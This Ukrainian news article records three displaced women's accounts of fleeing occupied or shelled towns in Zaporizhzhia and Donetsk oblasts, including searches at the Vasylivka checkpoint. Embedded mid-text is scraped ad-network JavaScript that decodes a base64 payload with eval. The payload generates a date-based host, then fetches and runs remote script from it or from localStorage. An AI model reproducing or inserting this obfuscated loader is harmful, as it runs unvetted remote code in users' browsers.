«Найскладніше це, мабуть, Василівський блокпост»: переселенки розповіли про життя в окупації та дорогу до Запоріжжя

Під обстрілами, на власних авто, автобусами та з перевірками окупантів на блокпостах — так виїжджали жінки разом зі своїми дітьми з окупованих територій, та з населених пунктів, де тривають бойові дії. Вимушені переселенки розказали журналістам Суспільного про евакуацію з рідних домівок.

Анастасія Кателло разом з сином евакуювалися до Запоріжжя 13 березня із селища Велика Новосілка Волноваського району Донецької області. Проживають в гуртожитку Хортицької національної академії.

“Нас вивезли, але не було у нас ще ні вибухів, нічого. Десь в нашому районі великі села вже гатили, а у нас ще була тиша. Ми виїхали за два тижні до перших прильотів. Було не важливо, куди їхати, аби було тихо та спокійно. Я дуже переживаю за дитину, за його психічний стан і звісно життя”, — каже вона.

переселенці

Анастасія Кателло. Фото: Суспільне Запоріжжя

Олена Миргородська виїхала з сином та племінником до Запоріжжя з села Балки Василівського району Запорізької області26 липня. Живе в гуртожитку, де і Анастасія Кателло. Вдома залишилися чоловік, брат та тяжко хвора мама Олени. Переселенка каже, довго не виїжджали, бо не хотіли покидати домівку, оскільки в селі було відносно спокійно.

переселенці

Олена Миргородська. Фото: Суспільне Запоріжжя var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

В нас перевізники є в місті Дніпрорудному, які займають місце в черзі, в колоні, тримають чергу, а потім вже викликають людей і маршрутки вивозять. Найскладніше це, мабуть, Василівський блокпост, бо вивертали всі сумки, навіть дитячі речі на землю, перевіряли ноутбуки, планшети. Боже збав, якщо десь побачать навіть слово «русня» чи тому подібне. Це дуже страшно було, тому що, якщо десь на флешці було фото у військовій формі — флешки забирали, ноутбуки. Це в кращому випадку. В гіршому — при мені молодого хлопця забрали разом з ноутбуком через те, що в нього виявили фото у військовій формі, як вони сказали, на бесіду. Ну, а далі, судячи з того які з ним пішли вести бесіду дядьки, то там явно нічого гарного не буде. Найстрашніше — це ті, хто перевзувся під російську владу, ті, хто почали просто по селу ходити і знущатися над своїми ж людьми, ось це найстрашніше”, — каже жінка.

Світлана Малюгіна разом з сином на власній автівці самостійно виїхали до Запоріжжя 6 червня з Оріхова. Чоловік її працює рятувальником. Вдома залишилася старша донька Світлани та її мама. Каже, виїжджати не хочуть, бояться потрапити під обстріли та втратити житло. В Запоріжжі переселенка винаймає квартиру.

переселенці

Світлана Малюгіна. Фото: Суспільне Запоріжжя

“Нас обстріляли, ми попали під такий обстріл сильний і довелося виїжджати. Виїхали. Був прильот, буквально через два будинки від нашого житла і обстановка, скажімо так, не з найкращих. Донька боїться виїжджати, і боїться залишати. Поки не вирішили ще. Роботу втратила, роботу розбили. В дитини школу розбили. Така ситуація. Чоловік працює, він рятувальник. Кожні два дні їздить на зміну до м. Оріхова, під обстрілами. Виконує свою роботу, рятує людей”, — каже Світлана. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/najskladnishe-tse-mabut-vasilivskij-blokpost-pereselenki-rozpovili-pro-zhittya-v-okupatsiyi-ta-dorogu-do-zaporizhzhya/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top